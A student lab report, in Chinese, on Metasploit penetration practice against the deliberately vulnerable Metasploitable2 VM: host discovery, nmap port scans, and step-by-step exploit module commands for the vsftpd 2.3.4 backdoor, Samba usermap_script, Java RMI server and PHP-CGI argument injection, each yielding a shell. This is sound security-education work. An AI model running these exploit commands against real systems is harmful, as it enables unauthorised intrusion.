当前位置: 首页 > news >正文

20232413 2025-2026-1 《网络与系统攻防技术》实验六实验报告

Metasploit攻击渗透实践
一.实验内容
1.前期渗透操作
2.Vsftpd 源码包后门漏洞
3.Samba MS-RPC Shell 命令注入漏洞
4.Java RMI Server 命令执行漏洞
5.PHP CGI 参数执行注入漏洞
二.实验过程
2.1前期渗透操作
2.1.1主机发现(ARP扫描)
先查看靶机的IP地址,这里用的是靶机Metasploitable2

image

 

得到ip地址为192.168.48.145

启动 Kali,打开终端,输入msfconsole启动 Metasploit。

输入以下命令进行ARP扫描:

search arp_sweep

use 0

set RHOSTS 192.168.48.0/24
run

image

 得到目标主机在线,且是VMware虚拟机

2.1.2端口扫描

使用命令:

nmap -sS -sV 192.168.48.145

对靶机进行SYN扫描

image

 发现靶机上开放了大量端口和漏洞

在msfconsole中使用tcp扫描,发现靶机开放的端口如下:

image

2.2Vsftpd源码包后门漏洞(21端口)

使用命令:

nmap -sV -p 21 192.168.48.145

扫描靶机21端口

image

 看出靶机端口21开放,运行vsftpd 2.3.4

在Mestasploit中利用vsftpd 2.3.4的后门漏洞

使用命令:

use exploit/unix/ftp/vsftpd_234_backdoor

set RHOSTS 192.168.48.145
run

image

 可以看出利用该漏洞可以获取靶机shell,用ls命令能查看目录文件

2.3SambaMS-RPC Shell命令注入漏洞(端口139)

使用命令:

nmap -p 139 192.168.48.145

扫描靶机139端口

image

 在Metasploit利用漏洞,命令如下:

use exploit/multi/samba/usermap_script
set RHOST 192.168.48.145
run

image

 获得了靶机shell,并能使用命令

2.4Java RMI SERVER命令执行漏洞(1099端口)

使用命令:

nmap -p 1099 192.168.48.145

扫描靶机1099端口是否开放

image

 在Metasploit利用Java RMI执行漏洞

use exploit/multi/misc/java_rmi_server

set RHOST 192.168.48.145
run

image

 执行漏洞后,输入shell进入交互式shell,可执行各种命令

2.5PHP CGI参数执行注入漏洞(80端口)

使用命令:

nmap -p 80 192.168.48.145

扫描靶机80端口

image

 在Metasploit中利用PHP-CGI的注入漏洞

use exploit/multi/http/php_cgi_arg_injection 

set RHOST 192.168.48.145
run

image

 攻击成功后,会获得 shell,可执行命令验证

三.问题及解决方案

问题:msfconsole无法正常使用

image

 

解决方法:执行apt update更新系统包列表,再用apt install ruby-psych安装缺失的 Ruby 依赖包,随后进入 Metasploit 目录(cd /usr/share/metasploit-framework)执行bundle install --redownload修复 Gem 依赖,必要时通过msfupdate更新 Metasploit,完成后重新运行msfconsole,即可修复依赖问题并正常启动 Metasploit。

四.学习感悟、思考

本次实验通过 Metasploit 对 Metasploitable2 靶机的多个经典漏洞进行了渗透测试,掌握了主机发现、端口扫描、漏洞利用的基本流程。Metasploit 的模块化设计极大简化了渗透测试步骤,但实际攻击中需注意目标网络环境和权限限制。通过实验深刻认识到服务版本漏洞的危害性,后续应加强对服务器版本管理和漏洞补丁的重视。

 

 

http://www.jsqmd.com/news/42801/

相关文章:

  • NOIP 模拟赛 7 总结
  • 20232314 2025-2026-1 《网络与系统攻防技术》实验六实验报告
  • 在AI技术唾手可得的时代,挖掘新需求成为制胜关键——某知名智能支付协议需求探索
  • 2025年护士站板材订做厂家权威推荐榜单:医疗防护抗倍特板/医用抗倍特板/医疗洁净板源头厂家精选
  • 2025年茉莉花茶定做厂家权威推荐榜单:青梅绿茶/无糖茶/乌龙茶源头厂家精选
  • 【项目复现上新】LLaMA Factory 微调实践:从零构建苏东坡角色扮演大模型 | 附Lab4AI平台一键复现指南
  • CF2164D Copy String
  • winform中消息机制使用CommunityToolkit.Mvvm
  • 使用agGrid的社区版实现层级列表显示
  • case linux
  • 2025年在淮安婚纱照拍摄团队公司实力盘点,弥素摄影工作室领衔十大精品机构
  • cadence linux
  • 当下山西比较好的纪念馆展示柜工厂排行榜揭晓
  • 2025年山西博物馆展示柜厂家排名前十推荐:专业评测与选择指南
  • 2025年山西博物馆展示柜厂家排名前十权威推荐
  • 2025年四川硬芯线厂家排名前十权威评测及行业选择指南
  • 2025年封闭母线槽厂家综合实力排行榜前十强权威发布
  • 百度贴吧 电子工程世界 哔哩哔哩 凯迪网 一牛网 电子工程网 思否 知乎 技术邻
  • 2025年国内锯条品牌口碑推荐排行榜TOP10权威发布
  • Codeforces Round 1064 (Div. 2) 做题记录
  • 2025年成都中杆灯厂家综合实力TOP10排行榜
  • 2025年下半年金属锯床厂家权威排名榜单:五大品牌综合评测
  • 2025年11月四川带锯床厂家口碑推荐榜单:成都鸿远机械领跑行业
  • 解密数字设计中的IP核心:高效构建电子系统的关键积木
  • 基于MATLAB的DPSK调制解调仿真
  • 2025年江苏浙江上海地区留学服务商综合实力排行榜TOP10
  • 想要寻找催化剂破坏牢固的键 想用相同热量找回最初感觉 麻木重复的过程逐渐取代新鲜 心腐蚀了一遍一遍
  • 2025年单向逆止托辊轴承实力厂家权威推荐榜单:皮带机托辊轴承/防尘防静电轴承/橡胶托辊轴承源头厂家精选
  • 2025年纯铜龙柱订做厂家权威推荐:小型铜龙柱/五代鎏金铜龙柱/锻铜龙柱源头厂家精选
  • 2025年西安买房开发商与楼盘终极推荐榜:十大口碑之选解析